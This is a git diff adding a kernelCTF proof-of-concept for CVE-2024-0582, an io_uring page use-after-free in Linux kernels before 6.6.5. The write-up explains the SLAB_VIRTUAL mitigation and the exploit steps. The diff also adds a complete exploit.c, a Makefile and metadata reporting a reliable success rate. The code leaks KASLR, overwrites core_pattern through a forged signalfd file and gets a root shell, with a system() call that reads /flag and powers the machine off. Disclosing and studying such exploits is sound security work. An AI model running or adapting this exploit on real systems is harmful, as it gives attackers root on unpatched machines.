+	list_for_each_entry_safe(slab, tmp, &local_queue, slab.slab_list) {
+		struct folio *folio = slab->slab.backing_folio;
+		struct kmem_cache *s = slab->slab.slab_cache;
+
+		list_del(&slab->slab.slab_list);
+		folio_clear_slab(folio, &slab->slab);
+		__free_pages(folio_page(folio, 0), oo_order(slab->slab.oo));
+
+		/* IRQs are already off */
+		spin_lock(&s->virtual.freed_slabs_lock);
+		if (oo_order(slab->slab.oo) == oo_order(s->min)) {
+			list_add(&slab->slab.slab_list, &s->virtual.freed_slabs_min);
+		} else {
+			WARN_ON(oo_order(slab->slab.oo) != oo_order(s->oo));
+			list_add(&slab->slab.slab_list, &s->virtual.freed_slabs);
+		}
+		WRITE_ONCE(s->virtual.nr_freed_pages, s->virtual.nr_freed_pages +
+			(1UL << slab_order(&slab->slab)));
+		spin_unlock(&s->virtual.freed_slabs_lock);
+	}
+	spin_unlock_irqrestore(&slub_kworker_lock, irq_flags);
+}
+```
+
+As we can see, the freed `virtual_slab` will go to the `virtual.freed_slabs{_min}` of its belonging `kmem_cache` while keeping its `virtual address space`.That's why `SLAB_VIRTUAL` prevents `cross-cache` attack efficiently.
+
+### Why Page UAF works
+
+Now it's not hard to get several conclusions:
+
+- Objects/pages directly allocated from buddy allocator are not protected by `SLAB_VIRTUAL`(true as its name implies). The same range of virtual address can be reused by different objects/pages once the appropriate pages are freed and returned to buddy allocator.
+- When a `virtual_slab` is allocated/reused, it will allocate pages from buddy allocator as `backing_folio` and set up ptes between `virt_mapping` and physical pages of `backing_folio`.
+- Normally “same order and same migratetype” pages get stored in the PCP list, which allows them to be quickly reused. 
+
+The above is the basic logic of how page UAF (still) works on Google's kernelCTF mitigation instance.  
+
+## Exploit Details
+
+Pin cpu to a certain core to increase the exploit stability as later we need to play with PCP list:
+
+```c
+static void pin_cpu(int cpu_n, pid_t pid) {
+  cpu_set_t set;
+
+  CPU_ZERO(&set);
+  CPU_SET(cpu_n, &set);
+
+  if (sched_setaffinity(pid, sizeof(set), &set) < 0) {
+    die("sched_setaffinity: %m");
+  }
+}
+
+pin_cpu(0, getpid());
+```
+
+Setup io_uring:
+
+```c
+  struct io_uring_params params = {.flags = IORING_SETUP_NO_SQARRAY};
+  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));
+```
+
+Spray pbuf and mmap buffer in order to create multiple single-page UAFs at the same time to increase the exploit stability:
+
+```c
+  for (int i = 0; i < SPRAY_PBUF_NUM; i++) {
+    struct io_uring_buf_reg reg = {
+        .ring_entries = 1, .bgid = i, .flags = IOU_PBUF_RING_MMAP};
+    SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING,
+                   &reg, 1));
+
+    pbuf_mappings[i] =
+        SYSCHK(mmap(NULL, 0x1000, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd,
+                    IORING_OFF_PBUF_RING + (i << IORING_OFF_PBUF_SHIFT)));
+    logi("[pbuf %d] mapped at %p", i, pbuf_mappings[i]);
+  }
+```
+
+Trigger page UAF:
+
+```c
+  for (int i = 0; i < SPRAY_PBUF_NUM; i++) {
+    struct io_uring_buf_reg unreg = {.bgid = i};
+    SYSCHK(syscall(__NR_io_uring_register, uring_fd,
+                   IORING_UNREGISTER_PBUF_RING, &unreg, 1));
+  }
+```
+
+Spray enough `struct file` to reuse the UAF page from PCP list
+
+```c
+  char buf[1024] = {};
+  for (int i = 0; i < SPRAY_FILE_NUM; i++) {
+    spray_fds[i] = SYSCHK(open("/tmp/tmp_file", O_RDWR | O_CREAT, 0666));
+    // later we can observe the write retval at victim_file->f_pos
+    SYSCHK(write(spray_fds[i], buf, i));
+  }
+```
+
+Locate victim_file:
+
+```c
+  void *victim_file_addr = NULL;
+  for (int i = 0; i < SPRAY_PBUF_NUM; i++) {
+    if (victim_file_addr)
+      break;
+    for (int j = 0; j < PAGE_SZ; j += ALIGNED_FILE_SZ) {
+      size_t shmem_file_operations =
+          *(size_t *)(pbuf_mappings[i] + j + OFFSET_FILE_FOP);
+      if ((shmem_file_operations & 0xfffff) ==
+          (SHMEM_FILE_OPERATIONS & 0xfffff)) {
+        victim_file_addr = pbuf_mappings[i] + j;
+        logi("victim_file_addr %p", victim_file_addr);
+        break;
+      }
+    }
+  }
+```
+
+Get victim_file index and leak kaslr:
+
+```c
+  size_t victim_file_idx = *(size_t *)(victim_file_addr + OFFSET_FILE_FPOS);
+  size_t shmem_file_operations =
+      *(size_t *)(victim_file_addr + OFFSET_FILE_FOP);
+  size_t kaslr = shmem_file_operations - SHMEM_FILE_OPERATIONS;
+  size_t signalfd_fops = SIGNALFD_FOPS + kaslr;
+  size_t core_pattern = CORE_PATTERN + kaslr;
+  size_t private_data_before =
+      *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA);
+```
+
+Abuse victim_file to get arbitrary write and overwrite the core_pattern:
+
+```c
+  *(size_t *)(victim_file_addr + OFFSET_FILE_FOP) = signalfd_fops;
+  char *fake = "|/proc/%P/fd/666 %P";
+  for (int i = 0; i <= strlen(fake); i++) { // include the null byte
+    *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA) = (core_pattern + i);
+    size_t mask = ~fake[i];
+    SYSCHK(signalfd(spray_fds[victim_file_idx], (const sigset_t *)&mask, 0));
+  }
+```
+
+This technique can be checked at [Mind the Gap - Project Zero: November 2022](https://googleprojectzero.blogspot.com/2022/11/#:~:text=struct%20was%20incremented.-,Overwriting%20the%20addr_limit,-Like%20many%20previous):
+
+```c
+static int do_signalfd4(int ufd, sigset_t *mask, int flags)
+{
+	struct signalfd_ctx *ctx;
+
+	/* Check the SFD_* constants for consistency.  */
+	BUILD_BUG_ON(SFD_CLOEXEC != O_CLOEXEC);
+	BUILD_BUG_ON(SFD_NONBLOCK != O_NONBLOCK);
+
+	if (flags & ~(SFD_CLOEXEC | SFD_NONBLOCK))
+		return -EINVAL;
+
+	sigdelsetmask(mask, sigmask(SIGKILL) | sigmask(SIGSTOP));
+	signotset(mask);
+
+	if (ufd == -1) {
+		ctx = kmalloc(sizeof(*ctx), GFP_KERNEL);
+		if (!ctx)
+			return -ENOMEM;
+
+		ctx->sigmask = *mask;
+
+		/*
+		 * When we call this, the initialization must be complete, since
+		 * anon_inode_getfd() will install the fd.
+		 */
+		ufd = anon_inode_getfd("[signalfd]", &signalfd_fops, ctx,
+				       O_RDWR | (flags & (O_CLOEXEC | O_NONBLOCK)));
+		if (ufd < 0)
+			kfree(ctx);
+	} else {
+		struct fd f = fdget(ufd);
+		if (!f.file)
+			return -EBADF;
+		ctx = f.file->private_data;	//	<-- get priv_data
+		if (f.file->f_op != &signalfd_fops) {
+			fdput(f);
+			return -EINVAL;
+		}
+		spin_lock_irq(&current->sighand->siglock);
+		ctx->sigmask = *mask;	//	<-- write here
+		spin_unlock_irq(&current->sighand->siglock);
+
+		wake_up(&current->sighand->signalfd_wqh);
+		fdput(f);
+	}
+
+	return ufd;
+}
+
+SYSCALL_DEFINE4(signalfd4, int, ufd, sigset_t __user *, user_mask,
+		size_t, sizemask, int, flags)
+{
+	sigset_t mask;
+
+	if (sizemask != sizeof(sigset_t))
+		return -EINVAL;
+	if (copy_from_user(&mask, user_mask, sizeof(mask)))
+		return -EFAULT;
+	return do_signalfd4(ufd, &mask, flags);
+}
+```
+
+Then we trigger the core_pattern and execute program with root privilege:
+
+```c
+// core_pattern exploit taken from
+// https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit.c#L444
+int check_core() {
+  // Check if /proc/sys/kernel/core_pattern has been overwritten
+  char buf[0x100] = {};
+  int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+  read(core, buf, sizeof(buf));
+  close(core);
+  return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
+}
+
+void crash(char *cmd) {
+  int memfd = memfd_create("", 0);
+  SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
+  dup2(memfd, 666);
+  close(memfd);
+  while (check_core() == 0)
+    sleep(1);
+  puts("Root shell !!");
+  /* Trigger program crash and cause kernel to executes program from
+   * core_pattern which is our "root" binary */
+  *(size_t *)0 = 0;
+}
+
+  // trigger core_pattern exploit
+  if (fork() == 0)
+    crash("");
+  while (1)
+    sleep(100);
+```
+
diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/vulnerability.md b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/vulnerability.md
new file mode 100644
index 00000000..8f13fa8b
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/docs/vulnerability.md
@@ -0,0 +1,33 @@
+# Vulneribility
+A page-level use-after-free flaw was found in the Linux kernel’s io_uring functionality in how a user registers a buffer ring with `IORING_REGISTER_PBUF_RING`, mmap() it, and then frees it.
+
+## Requirements to trigger the vulnerability
+ - Capabilities:  N / A
+ - Kernel configuration: `CONFIG_IO_URING`
+ - Are user namespaces needed?: N / A
+
+## Commit which introduced the vulnerability
+[io_uring: add support for user mapped provided buffer ring](https://github.com/torvalds/linux/commit/c56e022c0a27142b7b59ae6bdf45f86bf4b298a1)
+
+## Commit which fixed the vulnerability
+
+[io_uring/kbuf: defer release of mapped buffer rings](https://github.com/torvalds/linux/commit/c392cbecd8eca4c53f2bf508731257d9d0a21c2d)
+
+## Affected kernel versions
+
+- before 6.6.5
+
+## Affected component, subsystem
+- io_uring
+
+## Cause
+- UAF
+
+## Related syscalls
+
+- io_uring_setup
+- io_uring_register
+
+## CVE URL
+
+[NVD - cve-2024-0582](https://nvd.nist.gov/vuln/detail/cve-2024-0582)
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/Makefile b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/Makefile
new file mode 100644
index 00000000..fc4f5ed7
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/Makefile
@@ -0,0 +1,7 @@
+all: exploit
+
+exploit: exploit.c
+	gcc -o exploit exploit.c -static
+
+clean:
+	rm -rf exploit
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit
new file mode 100755
index 00000000..fd5511de
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit differ
diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit.c b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit.c
new file mode 100644
index 00000000..447baa0f
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/exploit/mitigation-v4-6.6/exploit.c
@@ -0,0 +1,254 @@
+#define _GNU_SOURCE
+#include <assert.h>
+#include <err.h>
+#include <fcntl.h>
+#include <linux/io_uring.h>
+#include <pthread.h>
+#include <sched.h>
+#include <stdarg.h>
+#include <stdint.h>
+#include <stdio.h>
+#include <stdlib.h>
+#include <string.h>
+#include <sys/mman.h>
+#include <sys/resource.h>
+#include <sys/sendfile.h>
+#include <sys/signalfd.h>
+#include <sys/socket.h>
+#include <sys/syscall.h>
+#include <sys/un.h>
+#include <sys/wait.h>
+#include <syscall.h>
+#include <unistd.h>
+
+#define COLOR_GREEN "\033[32m"
+#define COLOR_RED "\033[31m"
+#define COLOR_YELLOW "\033[33m"
+#define COLOR_DEFAULT "\033[0m"
+
+#define logd(fmt, ...)                                                         \
+  dprintf(2, "[*] %s:%d " fmt "\n", __FILE__, __LINE__, ##__VA_ARGS__)
+#define logi(fmt, ...)                                                         \
+  dprintf(2, COLOR_GREEN "[+] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__,        \
+          __LINE__, ##__VA_ARGS__)
+#define logw(fmt, ...)                                                         \
+  dprintf(2, COLOR_YELLOW "[!] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__,       \
+          __LINE__, ##__VA_ARGS__)
+#define loge(fmt, ...)                                                         \
+  dprintf(2, COLOR_RED "[-] %s:%d " fmt "\n" COLOR_DEFAULT, __FILE__,          \
+          __LINE__, ##__VA_ARGS__)
+#define die(fmt, ...)                                                          \
+  do {                                                                         \
+    loge(fmt, ##__VA_ARGS__);                                                  \
+    loge("Exit at line %d", __LINE__);                                         \
+    exit(1);                                                                   \
+  } while (0)
+
+#define SYSCHK(x)                                                              \
+  ({                                                                           \
+    typeof(x) __res = (x);                                                     \
+    if (__res == (typeof(x))-1)                                                \
+      err(1, "SYSCHK(" #x ")");                                                \
+    __res;                                                                     \
+  })
+
+#define SHMEM_FILE_OPERATIONS (0xffffffff82c44a40)
+#define SIGNALFD_FOPS (0xffffffff82c4cc80)
+#define CORE_PATTERN (0xffffffff83db3720)
+
+#define SPRAY_PBUF_NUM (0x10)
+#define SPRAY_FILE_NUM (0x200)
+int spray_fds[SPRAY_FILE_NUM];
+void *pbuf_mappings[SPRAY_PBUF_NUM];
+
+#define PAGE_SZ (0x1000)
+
+#define OFFSET_FILE_FPOS (64)
+#define OFFSET_FILE_FOP (176)
+#define OFFSET_FILE_PRIV_DATA (200)
+#define ALIGNED_FILE_SZ (256)
+
+// clang-format off
+/*
+struct file {
+        union {
+                struct llist_node  f_llist;                   0     8 
+                struct callback_head f_rcuhead __attribute__((__aligned__(8)));      0    16 
+                unsigned int       f_iocb_flags;              0     4 
+        } __attribute__((__aligned__(8)));                    0    16 
+        spinlock_t                 f_lock;                   16     4 
+        fmode_t                    f_mode;                   20     4 
+        atomic_long_t              f_count;                  24     8 
+        struct mutex               f_pos_lock;               32    32 
+         --- cacheline 1 boundary (64 bytes) --- 
+        loff_t                     f_pos;                    64     8 
+        unsigned int               f_flags;                  72     4 
+
+         XXX 4 bytes hole, try to pack 
+
+        struct fown_struct         f_owner;                  80    32 
+        const struct cred  *       f_cred;                  112     8 
+        struct file_ra_state       f_ra;                    120    32 
+         --- cacheline 2 boundary (128 bytes) was 24 bytes ago --- 
+        struct path                f_path;                  152    16 
+        struct inode *             f_inode;                 168     8 
+        const struct file_operations  * f_op;               176     8 
+        u64                        f_version;               184     8 
+         --- cacheline 3 boundary (192 bytes) --- 
+        void *                     f_security;              192     8 
+        void *                     private_data;            200     8 
+        struct hlist_head *        f_ep;                    208     8 
+        struct address_space *     f_mapping;               216     8 
+        errseq_t                   f_wb_err;                224     4 
+        errseq_t                   f_sb_err;                228     4 
+
+         size: 232, cachelines: 4, members: 20 
+         sum members: 228, holes: 1, sum holes: 4 
+         forced alignments: 1 
+         last cacheline: 40 bytes 
+} __attribute__((__aligned__(8)));
+*/
+// clang-format on
+
+static void pin_cpu(int cpu_n, pid_t pid) {
+  cpu_set_t set;
+
+  CPU_ZERO(&set);
+  CPU_SET(cpu_n, &set);
+
+  if (sched_setaffinity(pid, sizeof(set), &set) < 0) {
+    die("sched_setaffinity: %m");
+  }
+}
+
+// core_pattern exploit taken from
+// https://github.com/google/security-research/blob/master/pocs/linux/kernelctf/CVE-2023-52447_cos/exploit/cos-105-17412.294.10/exploit.c#L444
+int check_core() {
+  // Check if /proc/sys/kernel/core_pattern has been overwritten
+  char buf[0x100] = {};
+  int core = open("/proc/sys/kernel/core_pattern", O_RDONLY);
+  read(core, buf, sizeof(buf));
+  close(core);
+  return strncmp(buf, "|/proc/%P/fd/666", 0x10) == 0;
+}
+void crash(char *cmd) {
+  int memfd = memfd_create("", 0);
+  SYSCHK(sendfile(memfd, open("/proc/self/exe", 0), 0, 0xffffffff));
+  dup2(memfd, 666);
+  close(memfd);
+  while (check_core() == 0)
+    sleep(1);
+  puts("Root shell !!");
+  /* Trigger program crash and cause kernel to executes program from
+   * core_pattern which is our "root" binary */
+  *(size_t *)0 = 0;
+}
+
+int main(int argc, char **argv) {
+  if (argc > 1) {
+    // This section of code will be execute by root!
+    int pid = strtoull(argv[1], 0, 10);
+    int pfd = syscall(SYS_pidfd_open, pid, 0);
+    int stdinfd = syscall(SYS_pidfd_getfd, pfd, 0, 0);
+    int stdoutfd = syscall(SYS_pidfd_getfd, pfd, 1, 0);
+    int stderrfd = syscall(SYS_pidfd_getfd, pfd, 2, 0);
+    dup2(stdinfd, 0);
+    dup2(stdoutfd, 1);
+    dup2(stderrfd, 2);
+    /* Get flag and poweroff immediately to boost next round try in PR
+     * verification workflow*/
+    system("cat /flag;echo o>/proc/sysrq-trigger;");
+    execlp("bash", "bash", NULL);
+    exit(0);
+  }
+  setvbuf(stdout, 0, 2, 0);
+
+  // pin cpu to a certain core to increase the exploit stability as later we
+  // need to play with PCP list
+  pin_cpu(0, getpid());
+
+  // setup io_uring
+  struct io_uring_params params = {.flags = IORING_SETUP_NO_SQARRAY};
+  int uring_fd = SYSCHK(syscall(__NR_io_uring_setup, /*entries=*/40, &params));
+  logi("uring_fd = %d", uring_fd);
+
+  // spray pbuf and mmap buffer in order to create multiple single-page UAFs at
+  // the same time to increase the exploit stability
+  for (int i = 0; i < SPRAY_PBUF_NUM; i++) {
+    struct io_uring_buf_reg reg = {
+        .ring_entries = 1, .bgid = i, .flags = IOU_PBUF_RING_MMAP};
+    SYSCHK(syscall(__NR_io_uring_register, uring_fd, IORING_REGISTER_PBUF_RING,
+                   &reg, 1));
+
+    pbuf_mappings[i] =
+        SYSCHK(mmap(NULL, PAGE_SZ, PROT_READ | PROT_WRITE, MAP_SHARED, uring_fd,
+                    IORING_OFF_PBUF_RING + (i << IORING_OFF_PBUF_SHIFT)));
+    logi("[pbuf %d] mapped @ %p", i, pbuf_mappings[i]);
+  }
+
+  // trigger page UAF
+  for (int i = 0; i < SPRAY_PBUF_NUM; i++) {
+    struct io_uring_buf_reg unreg = {.bgid = i};
+    SYSCHK(syscall(__NR_io_uring_register, uring_fd,
+                   IORING_UNREGISTER_PBUF_RING, &unreg, 1));
+  }
+
+  // spray enough `struct file` to reuse the UAF page from PCP list
+  char buf[1024] = {};
+  for (int i = 0; i < SPRAY_FILE_NUM; i++) {
+    spray_fds[i] = SYSCHK(open("/tmp/tmp_file", O_RDWR | O_CREAT, 0666));
+    // later we can observe the write retval at victim_file->f_pos
+    SYSCHK(write(spray_fds[i], buf, i));
+  }
+
+  // locate victim_file
+  void *victim_file_addr = NULL;
+  for (int i = 0; i < SPRAY_PBUF_NUM; i++) {
+    if (victim_file_addr)
+      break;
+    for (int j = 0; j < PAGE_SZ; j += ALIGNED_FILE_SZ) {
+      size_t shmem_file_operations =
+          *(size_t *)(pbuf_mappings[i] + j + OFFSET_FILE_FOP);
+      if ((shmem_file_operations & 0xfffff) ==
+          (SHMEM_FILE_OPERATIONS & 0xfffff)) {
+        victim_file_addr = pbuf_mappings[i] + j;
+        logi("victim_file_addr %p", victim_file_addr);
+        break;
+      }
+    }
+  }
+
+  // get victim_file index and leak kaslr
+  size_t victim_file_idx = *(size_t *)(victim_file_addr + OFFSET_FILE_FPOS);
+  size_t shmem_file_operations =
+      *(size_t *)(victim_file_addr + OFFSET_FILE_FOP);
+  size_t kaslr = shmem_file_operations - SHMEM_FILE_OPERATIONS;
+  size_t signalfd_fops = SIGNALFD_FOPS + kaslr;
+  size_t core_pattern = CORE_PATTERN + kaslr;
+  size_t private_data_before =
+      *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA);
+  logi("victim_file_idx @ 0x%lx", victim_file_idx);
+  logi("shmem_file_operations @ 0x%lx", shmem_file_operations);
+  logi("private_data_before @ 0x%lx", private_data_before);
+  logi("kaslr @ 0x%lx", kaslr);
+
+  // modify victim_file's fops to signalfd_fops
+  *(size_t *)(victim_file_addr + OFFSET_FILE_FOP) = signalfd_fops;
+  // fake victim_file's private_data to overwrite core_pattern
+  char *fake = "|/proc/%P/fd/666 %P";
+  for (int i = 0; i <= strlen(fake); i++) { // include the null byte
+    *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA) = (core_pattern + i);
+    size_t mask = ~fake[i];
+    SYSCHK(signalfd(spray_fds[victim_file_idx], (const sigset_t *)&mask, 0));
+  }
+
+  // fix victim_file
+  *(size_t *)(victim_file_addr + OFFSET_FILE_FOP) = shmem_file_operations;
+  *(size_t *)(victim_file_addr + OFFSET_FILE_PRIV_DATA) = private_data_before;
+
+  // trigger core_pattern exploit
+  if (fork() == 0)
+    crash("");
+  while (1)
+    sleep(100);
+}
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/metadata.json b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/metadata.json
new file mode 100644
index 00000000..4dc8e39b
--- /dev/null
+++ b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/metadata.json
@@ -0,0 +1,32 @@
+{
+    "$schema": "https://google.github.io/security-research/kernelctf/metadata.schema.v3.json",
+    "submission_ids": [
+        "exp211"
+    ],
+    "vulnerability": {
+        "patch_commit": "https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=c392cbecd8eca4c53f2bf508731257d9d0a21c2d",
+        "cve": "CVE-2024-0582",
+        "affected_versions": [
+            "6.4 - 6.6.5"
+        ],
+        "requirements": {
+            "attack_surface": [
+                "io_uring"
+            ],
+            "capabilities": [
+            ],
+            "kernel_config": [
+                "CONFIG_IO_URING"
+            ]
+        }
+    },
+    "exploits": {
+        "mitigation-v4-6.6": {
+          "uses": [
+            "io_uring"
+          ],
+          "requires_separate_kaslr_leak": false,
+          "stability_notes": "10 times success per 10 times run"
+      }
+    }
+}
\ No newline at end of file
diff --git a/pocs/linux/kernelctf/CVE-2024-0582_mitigation/original.tar.gz b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/original.tar.gz
new file mode 100755
index 00000000..7d21e23c
Binary files /dev/null and b/pocs/linux/kernelctf/CVE-2024-0582_mitigation/original.tar.gz differ